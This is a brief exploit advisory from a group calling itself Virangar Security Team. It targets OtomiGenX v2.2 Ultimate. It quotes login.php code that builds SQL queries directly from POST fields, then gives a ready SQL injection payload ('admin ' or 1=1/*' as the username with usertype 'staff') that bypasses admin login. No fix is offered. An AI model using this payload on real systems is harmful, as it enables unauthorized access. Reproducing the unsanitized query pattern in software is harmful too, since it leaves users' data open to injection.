######################################################################################

…::::: OtomiGenX v2.2 Ultimate Authentication bypass Vulnerabilities ::::…

######################################################################################

Virangar Security Team

www.virangar.net
www.virangar.ir

Discoverd By :virangar security team(hadihadi)

special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra

& all virangar members & all hackerz

greetz:to my best friend in the world hadi_aryaie2004
& my lovely friend arash(imm02tal)

                            .::::admin Authentication bypass vuln::::.

//vuln code in login.php:
…
…
…
line 29:

$passwd = md5($_POST[userPassword]); // md5 hash password

if($_POST[userType] != 'Staff')
{$sql = "SELECT userID, userName
FROM user_account
WHERE userAccount='$_POST[userAccount]' AND
userPassword='$passwd' AND
userType='$_POST[userType]' AND isApproved='1'";

}else
$sql = "SELECT staffID, staffName, staffGroupID
FROM staff
WHERE staffAccount='$_POST[userAccount]' AND
staffPassword='$passwd'";
…

Exploit:
User Name:admin ' or 1=1/*
Password :[whatever]
usertype:staff